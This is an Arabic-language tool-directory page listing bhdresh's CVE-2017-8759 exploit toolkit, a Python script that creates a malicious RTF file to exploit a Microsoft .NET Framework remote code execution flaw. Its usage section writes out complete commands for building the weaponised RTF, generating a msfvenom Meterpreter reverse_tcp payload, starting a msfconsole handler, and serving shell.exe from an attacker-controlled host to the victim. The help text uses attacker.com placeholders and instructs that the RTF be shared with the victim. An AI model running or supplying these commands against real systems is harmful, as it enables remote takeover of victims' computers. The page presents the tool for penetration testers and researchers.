Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-8759 — مجموعة أدوات الاستغلال CVE-2017-8759 - الإصدار 1.0 هي سكريبت بايثون عملي يوفر لمختبري الاختراق وباحثي الأمان طريقة سريعة وفعالة لاختبار ثغرة تنفيذ الأوامر عن بُعد (RCE) في Microsoft .NET Framework. يمكنها إنشاء ملف RTF ضار وتوصيل حمولة metasploit / meterpreter / غيرها إلى الضحية دون أي تكوين معقد. | Kitploit
أدوات/GitHubGitHub/bhdresh/cve-2017-8759
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubbhdresh/cve-2017-8759

CVE-2017-8759

عرض المستودع
312109منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

مجموعة أدوات الاستغلال CVE-2017-8759 - الإصدار 1.0 هي سكريبت بايثون عملي يوفر لمختبري الاختراق وباحثي الأمان طريقة سريعة وفعالة لاختبار ثغرة تنفيذ الأوامر عن بُعد (RCE) في Microsoft .NET Framework. يمكنها إنشاء ملف RTF ضار وتوصيل حمولة metasploit / meterpreter / غيرها إلى الضحية دون أي تكوين معقد.

مشاركة

مجموعة أدوات استغلال CVE-2017-8759 - v1.0

مجموعة أدوات استغلال CVE-2017-8759 - v1.0 هي نص بايثون مفيد يوفر لمختبري الاختراق وباحثي الأمن طريقة سريعة وفعالة لاختبار تنفيذ التعليمات البرمجية عن بعد (RCE) في إطار عمل Microsoft .NET Framework. يمكنه إنشاء ملف RTF ضار وتسليم حمولة metasploit / meterpreter / أي حمولة أخرى للضحية دون أي تكوين معقد.

إخلاء مسؤولية

هذا البرنامج مخصص للأغراض التعليمية فقط. لا تستخدمه دون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة حقيقة أنني (bhdresh) لست مسؤولاً عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. لا يتحمل المؤلف أو أي مزود إنترنت أي مسؤولية عن المحتوى أو سوء استخدام هذه البرامج أو أي مشتقات منها. باستخدام هذا البرنامج، فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس مسؤولية bhdresh.

أخيرًا، هذا تطوير شخصي، يرجى احترام فلسفته وعدم استخدامه للأمور السيئة!

الترخيص

رخصة CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

ملاحظات الإصدار:

تم إدخال الإمكانيات التالية في البرنامج النصي

root@kitploit:~
- إنشاء ملف RTF ضار
- وضع الاستغلال للملف RTF الذي تم إنشاؤه

الإصدار: Python version 2.7.13

السيناريو: تسليم حمولة meterpreter محلية

فيديو تعليمي: https://www.youtube.com/watch?v=46jEa1bmORM
أمثلة على الأوامر
root@kitploit:~
1) إنشاء ملف RTF ضار
   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (اختياري، إذا كنت تستخدم حمولة MSF): إنشاء حمولة metasploit وبدء المعالج
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) بدء مجموعة الأدوات في وضع الاستغلال لتسليم الحمولة المحلية
   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

وسائط سطر الأوامر:

root@kitploit:~
# python cve-2017-8759_toolkit.py -h

هذه مجموعة أدوات مفيدة لاستغلال CVE-2017-8759 (Microsoft .NET Framework RCE)

الأوضاع:

-M gen                                          إنشاء ملف ضار فقط

     إنشاء ملف RTF ضار:

      -w <Filename.rtf>                   اسم ملف RTF الضار (شارك هذا الملف مع الضحية).

      -u <http://attacker.com/test.txt>   مسار ملف txt البعيد. عادةً، يجب أن يكون هذا نطاقاً أو عنوان IP حيث تعمل هذه                                          الأداة.
                                          على سبيل المثال، http://attackerip.com/test.txt (سيتم تضمين عنوان URL هذا في 	                                              ملف RTF الضار وسيتم طلبه بمجرد أن يفتح الضحية ملف RTF الضار.

				      
-M exp                                          بدء وضع الاستغلال

     الاستغلال:
  
      -p <TCP port:Default 80>            رقم المنفذ المحلي.

      -e <http://attacker.com/shell.exe>  مسار ملف تنفيذي / شيل meterpreter / حمولة يجب تنفيذها على الهدف.

      -l </tmp/shell.exe>                 حدد المسار المحلي لملف تنفيذي / شيل meterpreter / حمولة.

المؤلف

@bhdresh

الإقرار

@Voulnet, @vysec, @bhdresh

الأخطاء والمشاكل وطلبات الميزات

من الواضح أنني لست مطورًا بدوام كامل، لذا توقع بعض المشاكل.

يرجى الإبلاغ عن الأخطاء والمشاكل عبر https://github.com/bhdresh/CVE-2017-8759/issues/new

تنزيل الأداة